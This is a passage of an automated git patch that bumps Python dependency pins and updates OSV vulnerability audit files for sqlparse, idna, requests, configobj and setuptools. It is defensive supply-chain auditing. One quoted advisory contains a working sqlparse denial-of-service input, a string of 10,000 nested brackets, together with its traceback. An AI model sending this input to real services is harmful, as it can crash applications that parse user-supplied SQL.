From bcff2354769b316caa1a0da14be1ba7fe06de68b Mon Sep 17 00:00:00 2001 From: "github.actions" Date: Mon, 14 Oct 2024 08:05:12 +0000 Subject: [PATCH] Latest data: Mon Oct 14 08:05:12 UTC 2024 --- audits/dolphie-requirements.audit.json | 142 + audits/sickchill-requirements.audit.json | 2381 ++++------------- requirements/awscli-local-requirements.txt | 10 +- requirements/cf2tf-requirements.txt | 12 +- requirements/dolphie-requirements.txt | 10 +- requirements/hatch-requirements.txt | 6 +- requirements/iconsur-requirements.txt | 4 +- requirements/moto-requirements.txt | 2 +- requirements/podman-compose-requirements.txt | 2 +- requirements/policy_sentry-requirements.txt | 12 +- requirements/psutils-requirements.txt | 4 +- requirements/pyqt-builder-requirements.txt | 2 +- requirements/pyspelling-requirements.txt | 14 +- requirements/raven-requirements.txt | 2 +- requirements/rpmspectool-requirements.txt | 2 +- requirements/ruff-lsp-requirements.txt | 2 +- requirements/s3ql-requirements.txt | 14 +- requirements/sail-requirements.txt | 6 +- requirements/salt-lint-requirements.txt | 2 +- requirements/sceptre-requirements.txt | 16 +- requirements/schemathesis-requirements.txt | 4 +- requirements/scoutsuite-requirements.txt | 85 +- requirements/scrapy-requirements.txt | 21 +- .../search-that-hash-requirements.txt | 8 +- requirements/sherlock-requirements.txt | 12 +- requirements/shub-requirements.txt | 10 +- requirements/shyaml-requirements.txt | 2 +- requirements/sickchill-requirements.txt | 57 +- requirements/sigma-cli-requirements.txt | 18 +- requirements/sip-requirements.txt | 2 +- .../slither-analyzer-requirements.txt | 21 +- requirements/snakemake-requirements.txt | 3 +- requirements/subliminal-requirements.txt | 18 +- requirements/suricata-requirements.txt | 2 +- requirements/svtplay-dl-requirements.txt | 8 +- requirements/sysaidmin-requirements.txt | 14 +- requirements/tarsnapper-requirements.txt | 2 +- requirements/tccutil-requirements.txt | 2 +- requirements/tern-requirements.txt | 2 +- requirements/terraform-local-requirements.txt | 10 +- requirements/tmuxp-requirements.txt | 2 +- requirements/toot-requirements.txt | 2 +- requirements/touca-requirements.txt | 2 +- requirements/trafilatura-requirements.txt | 12 +- requirements/tvnamer-requirements.txt | 6 +- requirements/twarc-requirements.txt | 4 +- requirements/uhd-requirements.txt | 2 +- requirements/urlwatch-requirements.txt | 18 +- requirements/vdirsyncer-requirements.txt | 13 +- requirements/vint-requirements.txt | 2 +- requirements/vit-requirements.txt | 4 +- requirements/volk-requirements.txt | 4 +- requirements/vunnel-requirements.txt | 6 +- requirements/watson-requirements.txt | 8 +- requirements/woob-requirements.txt | 14 +- requirements/zabbix-cli-requirements.txt | 10 +- 56 files changed, 991 insertions(+), 2064 deletions(-) create mode 100644 audits/dolphie-requirements.audit.json diff --git a/audits/dolphie-requirements.audit.json b/audits/dolphie-requirements.audit.json new file mode 100644 index 00000000..4a57d3ce --- /dev/null +++ b/audits/dolphie-requirements.audit.json @@ -0,0 +1,142 @@ +[ + { + "package": { + "name": "sqlparse", + "version": "0.4.4", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "dolphie-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-05-01T11:15:56Z", + "published": "2024-04-15T20:21:25Z", + "schema_version": "1.6.0", + "id": "GHSA-2m57-hf25-phgg", + "aliases": [ + "CVE-2024-4340" + ], + "related": [ + "CGA-p7rq-qffc-ch9v", + "CGA-v3hx-x533-rpgf" + ], + "summary": "sqlparse parsing heavily nested list leads to Denial of Service", + "details": "### Summary\nPassing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.\n\n### Details + PoC\nRunning the following code will raise Maximum recursion limit exceeded exception:\n```py\nimport sqlparse\nsqlparse.parse('[' * 10000 + ']' * 10000)\n```\nWe expect a traceback of RecursionError:\n```py\nTraceback (most recent call last):\n File \"trigger_sqlparse_nested_list.py\", line 3, in \n sqlparse.parse('[' * 10000 + ']' * 10000)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/__init__.py\", line 30, in parse\n return tuple(parsestream(sql, encoding))\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/filter_stack.py\", line 36, in run\n stmt = grouping.group(stmt)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py\", line 428, in group\n func(stmt)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py\", line 53, in group_brackets\n _group_matching(tlist, sql.SquareBrackets)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/engine/grouping.py\", line 48, in _group_matching\n tlist.group_tokens(cls, open_idx, close_idx)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 328, in group_tokens\n grp = grp_cls(subtokens)\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 161, in __init__\n super().__init__(None, str(self))\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 165, in __str__\n return ''.join(token.value for token in self.flatten())\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 165, in \n return ''.join(token.value for token in self.flatten())\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 214, in flatten\n yield from token.flatten()\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 214, in flatten\n yield from token.flatten()\n File \"/home/uriya/.local/lib/python3.10/site-packages/sqlparse/sql.py\", line 214, in flatten\n yield from token.flatten()\n [Previous line repeated 983 more times]\nRecursionError: maximum recursion depth exceeded\n```\n\n### Fix suggestion\nThe [flatten()](https://github.com/andialbrecht/sqlparse/blob/master/sqlparse/sql.py#L207) function of TokenList class should limit the recursion to a maximal depth:\n```py\nfrom sqlparse.exceptions import SQLParseError\n\nMAX_DEPTH = 100\n\n def flatten(self, depth=1):\n \"\"\"Generator yielding ungrouped tokens.\n\n This method is recursively called for all child tokens.\n \"\"\"\n if depth >= MAX_DEPTH:\n raise SQLParseError('Maximal depth reached')\n for token in self.tokens:\n if token.is_group:\n yield from token.flatten(depth + 1)\n else:\n yield token\n```\n\n### Impact\nDenial of Service (the impact depends on the use).\nAnyone parsing a user input with sqlparse.parse() is affected.\n", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "sqlparse", + "purl": "pkg:pypi/sqlparse" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.5.0" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.18", + "0.1.19", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.2.4", + "0.3.0", + "0.3.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.4.3", + "0.4.4" + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-2m57-hf25-phgg/GHSA-2m57-hf25-phgg.json" + }, + "ecosystem_specific": { + "affected_functions": [ + "sqlparse.parse" + ] + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-2m57-hf25-phgg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4340" + }, + { + "type": "WEB", + "url": "https://github.com/andialbrecht/sqlparse/commit/b4a39d9850969b4e1d6940d32094ee0b42a2cf03" + }, + { + "type": "PACKAGE", + "url": "https://github.com/andialbrecht/sqlparse" + }, + { + "type": "WEB", + "url": "https://research.jfrog.com/vulnerabilities/sqlparse-stack-exhaustion-dos-jfsa-2024-001031292" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-674" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-04-15T20:21:25Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-2m57-hf25-phgg" + ], + "aliases": [ + "CVE-2024-4340", + "GHSA-2m57-hf25-phgg" + ], + "max_severity": "7.5" + } + ] + } +] \ No newline at end of file diff --git a/audits/sickchill-requirements.audit.json b/audits/sickchill-requirements.audit.json index 570c9185..cba2af1a 100644 --- a/audits/sickchill-requirements.audit.json +++ b/audits/sickchill-requirements.audit.json @@ -1,136 +1,8 @@ [ { "package": { - "name": "configobj", - "version": "5.0.8", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-02-18T05:29:13Z", - "published": "2023-04-03T06:30:19Z", - "schema_version": "1.6.0", - "id": "GHSA-c33w-24p9-8m24", - "aliases": [ - "CVE-2023-26112" - ], - "related": [ - "CGA-9r88-r9jr-p44c" - ], - "summary": "configobj ReDoS exploitable by developer using values in a server-side configuration file", - "details": "All versions of the package configobj are vulnerable to Regular Expression Denial of Service (ReDoS) via the validate function, using (.+?)\\((.*)\\). **Note:** This is only exploitable in the case of a developer, putting the offending value in a server side configuration file.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "configobj", - "purl": "pkg:pypi/configobj" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "last_affected": "5.0.8" - } - ] - } - ], - "versions": [ - "4.4.0", - "4.5.0", - "4.5.1", - "4.5.2", - "4.5.3", - "4.6.0", - "4.7.0", - "4.7.1", - "4.7.2", - "5.0.0", - "5.0.1", - "5.0.2", - "5.0.3", - "5.0.4", - "5.0.5", - "5.0.6", - "5.0.7", - "5.0.8" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-c33w-24p9-8m24/GHSA-c33w-24p9-8m24.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26112" - }, - { - "type": "WEB", - "url": "https://github.com/DiffSK/configobj/issues/232" - }, - { - "type": "PACKAGE", - "url": "https://github.com/DiffSK/configobj" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BO4RLMYEJODCNUE3DJIIUUFVTPAG6VN" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NZHY7B33EFY4LESP2NI4APQUPRROTAZK" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PYU4IHVLOTYMFPH7KDOJGKZQR4GKWPFK" - }, - { - "type": "WEB", - "url": "https://security.snyk.io/vuln/SNYK-PYTHON-CONFIGOBJ-3252494" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-1333" - ], - "github_reviewed": true, - "github_reviewed_at": "2023-04-04T21:40:45Z", - "nvd_published_at": "2023-04-03T05:15:00Z", - "severity": "LOW" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-c33w-24p9-8m24" - ], - "aliases": [ - "CVE-2023-26112", - "GHSA-c33w-24p9-8m24" - ], - "max_severity": "3.7" - } - ] - }, - { - "package": { - "name": "idna", - "version": "3.6", + "name": "setuptools", + "version": "69.1.1", "ecosystem": "PyPI" }, "dependency_groups": [ @@ -138,42 +10,34 @@ ], "vulnerabilities": [ { - "modified": "2024-07-11T18:46:06Z", - "published": "2024-04-11T21:32:40Z", + "modified": "2024-08-03T08:11:47Z", + "published": "2024-07-15T03:30:57Z", "schema_version": "1.6.0", - "id": "GHSA-jjg7-2v4v-x38h", + "id": "GHSA-cx63-2mw6-8hw5", "aliases": [ - "CVE-2024-3651", - "PYSEC-2024-60" + "BIT-setuptools-2024-6345", + "CVE-2024-6345" ], "related": [ - "CGA-4vmg-xwqh-6xfw", - "CGA-4w25-8r45-gxwf", - "CGA-6445-8x27-cghw", - "CGA-7cvw-824f-57qj", - "CGA-7xfm-q24p-px8c", - "CGA-85gv-65g3-483h", - "CGA-9fj4-pj3g-gm6q", - "CGA-ccwr-5f2w-9q24", - "CGA-fgmr-v3f3-pxpw", - "CGA-hph5-hcwv-q9mm", - "CGA-mcgj-mc29-crgj", - "CGA-mq4p-ggpx-5vxw", - "CGA-q4wf-4rwg-334h", - "CGA-rmvf-7794-q3gg", - "CGA-v584-967x-qgpm", - "CGA-v6qx-945c-jj8w", - "CGA-xpcj-g2x8-wcc9", - "CGA-xw8q-xp4x-825w" + "CGA-374g-f8mr-whvm", + "CGA-4mw5-xqpj-q4mq", + "CGA-c5cf-23gj-ccmf", + "CGA-c79m-39cv-2j6g", + "CGA-f2p4-hwhx-72xc", + "CGA-h655-78w4-797j", + "CGA-qmjx-gwcv-4p8x", + "CGA-rjmx-vqfq-f7rh", + "CGA-x22r-fp37-7vh6", + "CGA-xrq9-4hfh-g5jh" ], - "summary": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode", - "details": "### Impact\nA specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.\n\n### Patches\nThe function has been refined to reject such strings without the associated resource consumption in version 3.7.\n\n### Workarounds\nDomain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.\n\n### References\n* https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb", + "summary": "setuptools vulnerable to Command Injection via package URL", + "details": "A vulnerability in the `package_index` module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.", "affected": [ { "package": { "ecosystem": "PyPI", - "name": "idna", - "purl": "pkg:pypi/idna" + "name": "setuptools", + "purl": "pkg:pypi/setuptools" }, "ranges": [ { @@ -183,1715 +47,630 @@ "introduced": "0" }, { - "fixed": "3.7" + "fixed": "70.0.0" } ] } ], "versions": [ - "0.1", - "0.2", - "0.3", - "0.4", - "0.5", - "0.6", - "0.7", + "0.6b1", + "0.6b2", + "0.6b3", + "0.6b4", + "0.6c1", + "0.6c10", + "0.6c11", + "0.6c2", + "0.6c3", + "0.6c4", + "0.6c5", + "0.6c6", + "0.6c7", + "0.6c8", + "0.6c9", + "0.7.2", + "0.7.3", + "0.7.4", + "0.7.5", + "0.7.6", + "0.7.7", + "0.7.8", "0.8", "0.9", + "0.9.1", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", "1.0", "1.1", + "1.1.1", + "1.1.2", + "1.1.3", + "1.1.4", + "1.1.5", + "1.1.6", + "1.1.7", + "1.2", + "1.3", + "1.3.1", + "1.3.2", + "1.4", + "1.4.1", + "1.4.2", + "10.0", + "10.0.1", + "10.1", + "10.2", + "10.2.1", + "11.0", + "11.1", + "11.2", + "11.3", + "11.3.1", + "12.0", + "12.0.1", + "12.0.2", + "12.0.3", + "12.0.4", + "12.0.5", + "12.1", + "12.2", + "12.3", + "12.4", + "13.0", + "13.0.1", + "13.0.2", + "14.0", + "14.1", + "14.1.1", + "14.2", + "14.3", + "14.3.1", + "15.0", + "15.1", + "15.2", + "16.0", + "17.0", + "17.1", + "17.1.1", + "18.0", + "18.0.1", + "18.1", + "18.2", + "18.3", + "18.3.1", + "18.3.2", + "18.4", + "18.5", + "18.6", + "18.6.1", + "18.7", + "18.7.1", + "18.8", + "18.8.1", + "19.0", + "19.1", + "19.1.1", + "19.2", + "19.3", + "19.4", + "19.4.1", + "19.5", + "19.6", + "19.6.1", + "19.6.2", + "19.7", "2.0", + "2.0.1", + "2.0.2", "2.1", - "2.10", + "2.1.1", + "2.1.2", "2.2", - "2.3", - "2.4", - "2.5", - "2.6", - "2.7", - "2.8", - "2.9", - "3.0", - "3.1", - "3.2", - "3.3", - "3.4", - "3.5", - "3.6" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-jjg7-2v4v-x38h/GHSA-jjg7-2v4v-x38h.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651" - }, - { - "type": "WEB", - "url": "https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d" - }, - { - "type": "PACKAGE", - "url": "https://github.com/kjd/idna" - }, - { - "type": "WEB", - "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml" - }, - { - "type": "WEB", - "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-400" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-04-11T21:32:40Z", - "nvd_published_at": "2024-07-07T18:15:09Z", - "severity": "MODERATE" - } - }, - { - "modified": "2024-07-11T17:42:33Z", - "published": "2024-07-07T18:15:00Z", - "schema_version": "1.6.0", - "id": "PYSEC-2024-60", - "aliases": [ - "CVE-2024-3651", - "GHSA-jjg7-2v4v-x38h" - ], - "details": "A vulnerability was identified in the kjd/idna library, specifically within the `idna.encode()` function, affecting version 3.6. The issue arises from the function's handling of crafted input strings, which can lead to quadratic complexity and consequently, a denial of service condition. This vulnerability is triggered by a crafted input that causes the `idna.encode()` function to process the input with considerable computational load, significantly increasing the processing time in a quadratic manner relative to the input size.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "idna", - "purl": "pkg:pypi/idna" - }, - "ranges": [ - { - "type": "GIT", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1d365e17e10d72d0b7876316fc7b9ca0eebdd38d" - } - ], - "repo": "https://github.com/kjd/idna" - }, - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0.1" - }, - { - "fixed": "3.7" - } - ] - } - ], - "versions": [ - "0.1", - "0.2", - "0.3", - "0.4", - "0.5", - "0.6", - "0.7", - "0.8", - "0.9", - "1.0", - "1.1", - "2.0", - "2.1", - "2.10", - "2.2", - "2.3", - "2.4", - "2.5", - "2.6", - "2.7", - "2.8", - "2.9", - "3.0", - "3.1", - "3.2", - "3.3", - "3.4", - "3.5", - "3.6" - ], - "database_specific": { - "source": "https://github.com/pypa/advisory-database/blob/main/vulns/idna/PYSEC-2024-60.yaml" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - } - ], - "references": [ - { - "type": "FIX", - "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb" - }, - { - "type": "FIX", - "url": "https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d" - } - ] - } - ], - "groups": [ - { - "ids": [ - "PYSEC-2024-60", - "GHSA-jjg7-2v4v-x38h" - ], - "aliases": [ - "CVE-2024-3651", - "GHSA-jjg7-2v4v-x38h", - "PYSEC-2024-60" - ], - "max_severity": "7.5" - } - ] - }, - { - "package": { - "name": "requests", - "version": "2.31.0", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-07-15T22:12:27Z", - "published": "2024-05-20T20:15:00Z", - "schema_version": "1.6.0", - "id": "GHSA-9wx4-h78v-vm56", - "aliases": [ - "CVE-2024-35195" - ], - "related": [ - "CGA-2qh2-jp77-wp2x", - "CGA-32qh-xq5g-9xq4", - "CGA-432x-3phh-56c7", - "CGA-4354-v6cq-3f5f", - "CGA-4xx2-v3vc-q5x8", - "CGA-6rf6-59qq-87jc", - "CGA-6v4c-f9mw-8ghc", - "CGA-74xp-46xv-7q3v", - "CGA-77h5-pgh2-r2fg", - "CGA-8mx8-8v5r-99xg", - "CGA-fff7-969w-wcq5", - "CGA-hf9v-fwg4-2jvw", - "CGA-hhrg-5mf5-r2p5", - "CGA-jcgc-jpw2-xpqq", - "CGA-p79x-5pxg-f77m", - "CGA-phrh-j36c-pqjq", - "CGA-rrq3-6489-25cv", - "CGA-v263-vf6g-w8hh", - "CGA-v542-whj6-7mj4", - "CGA-whqq-jwxh-vf92", - "CGA-x395-8f45-7j43" - ], - "summary": "Requests `Session` object does not verify requests after making first request with verify=False", - "details": "When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool.\n\n### Remediation\nAny of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation.\n\n* Upgrade to `requests>=2.32.0`.\n* For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session.\n* For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used.\n\n### Related Links\n* https://github.com/psf/requests/pull/6655", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "requests", - "purl": "pkg:pypi/requests" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "2.32.0" - } - ] - } - ], - "versions": [ - "0.0.1", - "0.10.0", - "0.10.1", - "0.10.2", - "0.10.3", - "0.10.4", - "0.10.6", - "0.10.7", - "0.10.8", - "0.11.1", - "0.11.2", - "0.12.0", - "0.12.01", - "0.12.1", - "0.13.0", - "0.13.1", - "0.13.2", - "0.13.3", - "0.13.4", - "0.13.5", - "0.13.6", - "0.13.7", - "0.13.8", - "0.13.9", - "0.14.0", - "0.14.1", - "0.14.2", - "0.2.0", - "0.2.1", - "0.2.2", - "0.2.3", - "0.2.4", - "0.3.0", - "0.3.1", - "0.3.2", - "0.3.3", - "0.3.4", - "0.4.0", - "0.4.1", - "0.5.0", - "0.5.1", - "0.6.0", - "0.6.1", - "0.6.2", - "0.6.3", - "0.6.4", - "0.6.5", - "0.6.6", - "0.7.0", - "0.7.1", - "0.7.2", - "0.7.3", - "0.7.4", - "0.7.5", - "0.7.6", - "0.8.0", - "0.8.1", - "0.8.2", - "0.8.3", - "0.8.4", - "0.8.5", - "0.8.6", - "0.8.7", - "0.8.8", - "0.8.9", - "0.9.0", - "0.9.1", - "0.9.2", - "0.9.3", - "1.0.0", - "1.0.1", - "1.0.2", - "1.0.3", - "1.0.4", - "1.1.0", - "1.2.0", - "1.2.1", - "1.2.2", - "1.2.3", - "2.0.0", - "2.0.1", - "2.1.0", - "2.10.0", - "2.11.0", - "2.11.1", - "2.12.0", - "2.12.1", - "2.12.2", - "2.12.3", - "2.12.4", - "2.12.5", - "2.13.0", - "2.14.0", - "2.14.1", - "2.14.2", - "2.15.0", - "2.15.1", - "2.16.0", - "2.16.1", - "2.16.2", - "2.16.3", - "2.16.4", - "2.16.5", - "2.17.0", - "2.17.1", - "2.17.2", - "2.17.3", - "2.18.0", - "2.18.1", - "2.18.2", - "2.18.3", - "2.18.4", - "2.19.0", - "2.19.1", - "2.2.0", - "2.2.1", - "2.20.0", - "2.20.1", - "2.21.0", - "2.22.0", - "2.23.0", - "2.24.0", - "2.25.0", - "2.25.1", - "2.26.0", - "2.27.0", - "2.27.1", - "2.28.0", - "2.28.1", - "2.28.2", - "2.29.0", - "2.3.0", - "2.30.0", - "2.31.0", - "2.4.0", - "2.4.1", - "2.4.2", - "2.4.3", - "2.5.0", - "2.5.1", - "2.5.2", - "2.5.3", - "2.6.0", - "2.6.1", - "2.6.2", - "2.7.0", - "2.8.0", - "2.8.1", - "2.9.0", - "2.9.1", - "2.9.2" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-9wx4-h78v-vm56/GHSA-9wx4-h78v-vm56.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195" - }, - { - "type": "WEB", - "url": "https://github.com/psf/requests/pull/6655" - }, - { - "type": "WEB", - "url": "https://github.com/psf/requests/commit/a58d7f2ffb4d00b46dca2d70a3932a0b37e22fac" - }, - { - "type": "PACKAGE", - "url": "https://github.com/psf/requests" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-670" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-05-20T20:15:00Z", - "nvd_published_at": "2024-05-20T21:15:09Z", - "severity": "MODERATE" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-9wx4-h78v-vm56" - ], - "aliases": [ - "CVE-2024-35195", - "GHSA-9wx4-h78v-vm56" - ], - "max_severity": "5.6" - } - ] - }, - { - "package": { - "name": "setuptools", - "version": "69.1.1", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "sickchill-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-08-03T08:11:47Z", - "published": "2024-07-15T03:30:57Z", - "schema_version": "1.6.0", - "id": "GHSA-cx63-2mw6-8hw5", - "aliases": [ - "BIT-setuptools-2024-6345", - "CVE-2024-6345" - ], - "related": [ - "CGA-374g-f8mr-whvm", - "CGA-4mw5-xqpj-q4mq", - "CGA-c5cf-23gj-ccmf", - "CGA-c79m-39cv-2j6g", - "CGA-f2p4-hwhx-72xc", - "CGA-h655-78w4-797j", - "CGA-qmjx-gwcv-4p8x", - "CGA-rjmx-vqfq-f7rh", - "CGA-x22r-fp37-7vh6", - "CGA-xrq9-4hfh-g5jh" - ], - "summary": "setuptools vulnerable to Command Injection via package URL", - "details": "A vulnerability in the `package_index` module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "setuptools", - "purl": "pkg:pypi/setuptools" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "70.0.0" - } - ] - } - ], - "versions": [ - "0.6b1", - "0.6b2", - "0.6b3", - "0.6b4", - "0.6c1", - "0.6c10", - "0.6c11", - "0.6c2", - "0.6c3", - "0.6c4", - "0.6c5", - "0.6c6", - "0.6c7", - "0.6c8", - "0.6c9", - "0.7.2", - "0.7.3", - "0.7.4", - "0.7.5", - "0.7.6", - "0.7.7", - "0.7.8", - "0.8", - "0.9", - "0.9.1", - "0.9.2", - "0.9.3", - "0.9.4", - "0.9.5", - "0.9.6", - "0.9.7", - "0.9.8", - "1.0", - "1.1", - "1.1.1", - "1.1.2", - "1.1.3", - "1.1.4", - "1.1.5", - "1.1.6", - "1.1.7", - "1.2", - "1.3", - "1.3.1", - "1.3.2", - "1.4", - "1.4.1", - "1.4.2", - "10.0", - "10.0.1", - "10.1", - "10.2", - "10.2.1", - "11.0", - "11.1", - "11.2", - "11.3", - "11.3.1", - "12.0", - "12.0.1", - "12.0.2", - "12.0.3", - "12.0.4", - "12.0.5", - "12.1", - "12.2", - "12.3", - "12.4", - "13.0", - "13.0.1", - "13.0.2", - "14.0", - "14.1", - "14.1.1", - "14.2", - "14.3", - "14.3.1", - "15.0", - "15.1", - "15.2", - "16.0", - "17.0", - "17.1", - "17.1.1", - "18.0", - "18.0.1", - "18.1", - "18.2", - "18.3", - "18.3.1", - "18.3.2", - "18.4", - "18.5", - "18.6", - "18.6.1", - "18.7", - "18.7.1", - "18.8", - "18.8.1", - "19.0", - "19.1", - "19.1.1", - "19.2", - "19.3", - "19.4", - "19.4.1", - "19.5", - "19.6", - "19.6.1", - "19.6.2", - "19.7", - "2.0", - "2.0.1", - "2.0.2", - "2.1", - "2.1.1", - "2.1.2", - "2.2", - "20.0", - "20.1", - "20.1.1", - "20.10.1", - "20.2.2", - "20.3", - "20.3.1", - "20.4", - "20.6.6", - "20.6.7", - "20.6.8", - "20.7.0", - "20.8.0", - "20.8.1", - "20.9.0", - "21.0.0", - "21.1.0", - "21.2.0", - "21.2.1", - "21.2.2", - "22.0.0", - "22.0.1", - "22.0.2", - "22.0.4", - "22.0.5", - "23.0.0", - "23.1.0", - "23.2.0", - "23.2.1", - "24.0.0", - "24.0.1", - "24.0.2", - "24.0.3", - "24.1.0", - "24.1.1", - "24.2.0", - "24.2.1", - "24.3.0", - 